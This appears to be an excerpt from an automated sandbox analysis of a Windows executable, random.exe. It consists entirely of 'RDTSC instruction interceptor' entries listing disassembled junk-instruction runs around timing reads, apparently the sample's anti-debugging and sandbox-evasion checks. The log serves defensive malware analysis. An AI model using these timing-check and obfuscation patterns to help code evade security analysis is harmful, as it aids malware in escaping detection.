            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E615B5 second address: E615C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F887475ED96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6475E second address: E6478D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8874D4CC99h 0x0000000c jmp 00007F8874D4CC8Ah 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E648E9 second address: E6491C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F887475EDA6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F887475EDA2h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6491C second address: E64935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8874D4CC8Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6512E second address: E65132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E65132 second address: E65143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F8874D4CC86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E65143 second address: E65160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F887475EDA6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E65160 second address: E65173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8874D4CC8Ch 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E652D5 second address: E6531C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F887475EDAAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007F887475ED96h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F887475EDA8h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6531C second address: E65320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6B7D7 second address: E6B7F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA9h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6B7F5 second address: E6B809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007F8874D4CC88h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6B937 second address: E6B956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F887475EDA7h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6BC23 second address: E6BC33 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8874D4CC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6BC33 second address: E6BC3D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F887475ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6BC3D second address: E6BC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8874D4CC92h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6BDC7 second address: E6BDFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F887475EDA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F887475EDA3h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6BDFD second address: E6BE05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6C0EF second address: E6C10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F887475EDA1h 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6C10E second address: E6C116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6C116 second address: E6C11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6CE51 second address: E6CE65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8874D4CC8Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6D5FD second address: E6D601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6D601 second address: E6D63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jno 00007F8874D4CC86h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 pushad 0x00000015 jno 00007F8874D4CC86h 0x0000001b push eax 0x0000001c pop eax 0x0000001d jmp 00007F8874D4CC8Dh 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 js 00007F8874D4CC86h 0x0000002d pushad 0x0000002e popad 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E6D63C second address: E6D641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E75F9C second address: E75FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E75FA0 second address: E75FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F887475ED9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E75FC2 second address: E75FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E75CB8 second address: E75CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E75CBE second address: E75CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E81C61 second address: E81C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E833A3 second address: E833AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E833AF second address: E833BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F887475ED96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DADF17 second address: DADF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DADF1F second address: DADF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DADF23 second address: DADF35 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8874D4CC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F8874D4CC86h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DADF35 second address: DADF39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DADF39 second address: DADF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E85EE6 second address: E85EF2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F887475ED9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E96133 second address: E9613F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9613F second address: E96145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E96145 second address: E96149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9D8B4 second address: E9D8DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F887475ED96h 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007F887475EDA3h 0x00000012 jp 00007F887475ED96h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9D8DE second address: E9D8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007F8874D4CC93h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9DA28 second address: E9DA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9DA2C second address: E9DA30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9DA30 second address: E9DA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9DA36 second address: E9DA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E9DE07 second address: E9DE1B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F887475ED96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F887475EDA2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA1C97 second address: EA1CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Fh 0x00000007 pushad 0x00000008 jmp 00007F8874D4CC90h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA1CC6 second address: EA1CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA1CCA second address: EA1CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA1CD0 second address: EA1CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F887475EDA5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA1CEA second address: EA1D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC97h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA1D0C second address: EA1D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA747D second address: EA7481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EA7481 second address: EA748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EB209A second address: EB20A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EB7166 second address: EB716C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EAFF45 second address: EAFF50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EAFF50 second address: EAFF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F887475EDA8h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC45E2 second address: EC45F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jo 00007F8874D4CC8Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC42E7 second address: EC42F5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F887475ED98h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC6040 second address: EC6044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC6044 second address: EC6050 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC6050 second address: EC6059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC6059 second address: EC605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EC5EB6 second address: EC5EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9B83 second address: ED9B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9B89 second address: ED9B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9B8D second address: ED9B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9B93 second address: ED9B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9B98 second address: ED9B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9F8A second address: ED9FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC94h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F8874D4CC86h 0x00000014 jg 00007F8874D4CC86h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: ED9FB3 second address: ED9FFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA2h 0x00000007 jng 00007F887475ED96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F887475EDA9h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jg 00007F887475ED96h 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 jnc 00007F887475ED96h 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EDA133 second address: EDA139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EDA139 second address: EDA143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F887475ED96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EDA143 second address: EDA17F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC97h 0x00000007 jo 00007F8874D4CC86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8874D4CC97h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EDEB57 second address: EDEB7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F887475EDA7h 0x0000000b jng 00007F887475ED9Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EE082B second address: EE0843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8874D4CC90h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DB658F second address: DB6594 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DB6594 second address: DB65B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC8Dh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8874D4CC86h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF53E4 second address: DF53E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF5613 second address: DF5617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860855 second address: 48608AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F887475EDA5h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007F887475ED9Ch 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F887475ED9Dh 0x00000020 or ecx, 5F7DBD76h 0x00000026 jmp 00007F887475EDA1h 0x0000002b popfd 0x0000002c mov ebx, eax 0x0000002e popad 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48608AF second address: 48608CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8874D4CC98h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48608CB second address: 4860935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F887475ED9Dh 0x00000011 sbb al, 00000036h 0x00000014 jmp 00007F887475EDA1h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F887475EDA0h 0x00000020 add esi, 4BE2DF58h 0x00000026 jmp 00007F887475ED9Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ecx 0x0000002e pushad 0x0000002f call 00007F887475EDA4h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860935 second address: 4860982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov cl, bh 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F8874D4CC93h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007F8874D4CC96h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8874D4CC97h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860982 second address: 4860988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860988 second address: 486098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 486098C second address: 48609A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F887475ED9Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860AAB second address: 4860AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860AB0 second address: 4860ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F887475EDA7h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860B26 second address: 4860B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860B2C second address: 4860B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
